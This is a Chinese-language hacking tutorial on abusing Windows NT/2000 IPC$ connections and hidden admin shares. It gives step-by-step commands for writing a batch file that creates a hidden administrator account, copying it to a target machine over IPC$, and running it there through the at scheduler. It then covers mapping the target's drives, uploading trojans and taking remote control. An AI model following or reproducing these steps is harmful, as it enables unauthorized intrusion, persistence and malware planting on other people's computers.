IPC$(Internet Process Connection)是共享"命名管道"的資源,它是爲了讓進程間通信而開放的命名管道,通過提供可信任的用戶名和口令,連接雙方可以建立安全的通道並以此通道進行加密數據的交換,從而實現對遠程計算機的訪問。IPC$是NT/2000的一項新功能,它有一個特點,即在同一時間內,兩個IP之間只允許建立一個連接。NT/2000在提供了ipc$功能的同時,在初次安裝系統時還打開了默認共享,即所有的邏輯共享(c$,d$,e$……)和系統目錄winnt或windows(admin$)共享。所有的這些,微軟的初衷都是爲了方便管理員的管理,但在有意無意中,導致了系統安全性的降低。
(1)爲了配合IPC共享工作,Windows操作系統(不包括Windows 98系列)在安裝完成後,自動設置共享的目錄爲:C盤、D盤、E盤、ADMIN目錄(C:\WINNT\)等,即爲ADMIN$、C$、D$、E$等等,但要注意,這些共享是隱藏的,只有管理員能夠對他們進行遠程操作。在MS-DOS中鍵入“net share”命令來查看本機共享資源。
(2)DOS的基本命令
DIR命令:列出當前路徑下的文件,常常用來查看想要找的文件是否在該路徑下。
CD命令:進入指定的目錄。比如,想進入E盤中的CODE文件夾,則在E:\>下鍵“CD CODE”命令。
常用的net命令:
net user:系統賬號類操作
net localgroup:系統組操作
net use:遠程連接、映射操作
net time:查看遠程主機系統時間
cls命令:清屏命令
netstart 命令:
(3)建立和斷開IPC$連接
留後門賬號
1、相關知識
①、什麼是BAT文件?
BAT文件是在Windows系統中的一種文件格式,稱爲批處理文件。簡單來說,就是把需要執行的一系列DOS命令按順序先後寫在一個後綴名爲BAT的文本文件中。通過鼠標雙擊或DOS命令執行該BAT文件,就相當於執行一系列DOS命令。
②、什麼是計劃任務?
舉個例子,假設想在明天上午10點給電腦殺毒,但是正好明天上午10點要出去辦事,那怎麼辦呢?這時候就要使用“計劃任務”這個功能,令計算機在明天上午10點自動執行殺毒程序。計劃任務是Windows系統自帶的功能,可以在控制面板中找到。除此之外,還可能用命令行的方式來添加計劃任務。
③、相關DOS命令
copy命令:把一個文件拷貝到另一個地方,“另一個地方”可以是本地計算機的目錄、磁盤,也可以是另一臺主機的目錄或磁盤。
at命令:用來建立計劃任務。
net time命令:用來查看目標計算機的系統時間,以便使用計劃任務指定時間。
net user命令:用來管理計算機上面的賬號。
— 查看賬號命令:net user
— 建立賬號命令:net user name passwd /add
— 刪除賬號命令:net user name passwd /del
net localgroup命令:用來管理工作組。
2、實例:建立後門賬號
步驟一:編寫BAT文件。
打開記事本,鍵入“net user sysbak 123456 /add”和“net localgroup administrators sysback /add”命令,編寫好命令後,把該文件另存爲“hack.bat”。下面對這兩個命令進行說明。
命令一:net user sysbak 123456 /add。該命令表示添加用戶名爲sysback,密碼爲123456的賬號。
參數說明:
“sysback”:用戶名
“123456”:用戶的密碼
“/add”:表示添加賬號
命令二:net localgroup administrators sysback /add。該命令表示把sysback添加到管理員組(administrators)。
參數說明:
“administrators”:表示管理員組
“sysback”:剛建立的用戶名
“/add”:表示添加賬號
步驟二:與目標主機建立IPC$連接。
使用命令:Net use \ip\ipc$ /user:用戶名 密碼
步驟三:拷貝文件至目標主機。
使用命令:copy FILE \IP\PATH
參數說明:
“FILE”表示本地的文件名
“IP”爲目標主機的IP地址
“PATH”保存文件的路徑
打開MS-DOS,鍵入“copy d:\hack.bat \192.168.27.128\c$”命令copy命令執行成功後,就已經把D盤下的hack.bat文件拷貝到192.168.27.128的C盤內。此外,也可以在圖形界面下把hack.bat複製、粘貼到目標主機中。
步驟四:通過計劃任務使遠程主機執行hack.bat文件。
首先鍵入“net time \IP”命令查看遠程主機的系統時間,再鍵入“at \IP TIME COMMAND”命令在遠程主機上建立計劃任務。
參數說明:
IP:目標主機IP
TIME:設定計劃任務執行的時間
COMMAND:計劃任務要執行的命令
打開MS-DOS,鍵入“net time \192.168.27.128”命令。假設回顯的目標系統時間爲13:33,然後根據該時間爲遠程主機建立計劃任務。鍵入“at\192.168.27.128 13:45 c:\hack.bat”命令,該命令表示在下午13點45分執行目標主機C盤中的hack.bat文件。計劃任務添加完畢後,使用命令“net use * /del”斷開IPC$連接。
步驟五:驗證賬號是否成功建立。等待一段時間後,估計遠程主機已經執行了hack.bat文件。下面通過建立IPC$連接來驗證是否成功建立“sysback”賬號。連接成功!說明管理員賬號“sysback”已經成功建立。
結論:
(1)打開目標IPC$:
首先你需要獲得一個不依賴於ipc$的shell,比如sql的cmd擴展、telnet、***。當然,這shell必須是admin權限的。然後你可以使用shell執行命令 net share ipc$ 來開放目標的ipc$。從上一問題可以知道,ipc$能否使用還有很多條件。請確認相關服務都已運行,沒有就啓動它(不知道怎麼做的請看net命令的用法)。還是不行的話(比如有防火牆,殺不了)建議放棄。
(2)映射和訪問默認共享:
使用命令 net use z: \目標IP\c$ "密碼" /user:"用戶名" 將對方的c盤映射爲自己的z盤,其他盤類推。 如果已經和目標建立了ipc$,則可以直接用IP加盤符加$訪問。比如 copy muma.exe
\IP\d$\path\muma.exe 。或者再映射也可以,只是不用用戶名和密碼了:net use y: \IP\d$ 。然後 copy muma.exe y:\path\muma.exe 。當路徑中包含空格時,須用""將路徑全引住。
(2)連接上IPC$後:
能使用管理員權限的帳號成功和目標連接ipc$,表示你可以和對方系統做深入“交流”了。你可以使用各種命令行方式的工具(比如pstools系列、Win2000SrvReskit、telnethack等)獲得目標信息、管理目標的進程和服務等。如果目標開放了默認共享(沒開你就幫他開),你就可以上傳***並運行。也可以用tftp、ftp的辦法上傳。像dwrcc、VNC、RemoteAdmin等工具(***)還具有直接控屏的功能。如果是2000server, 還可以考慮開啓終端服務方便控制。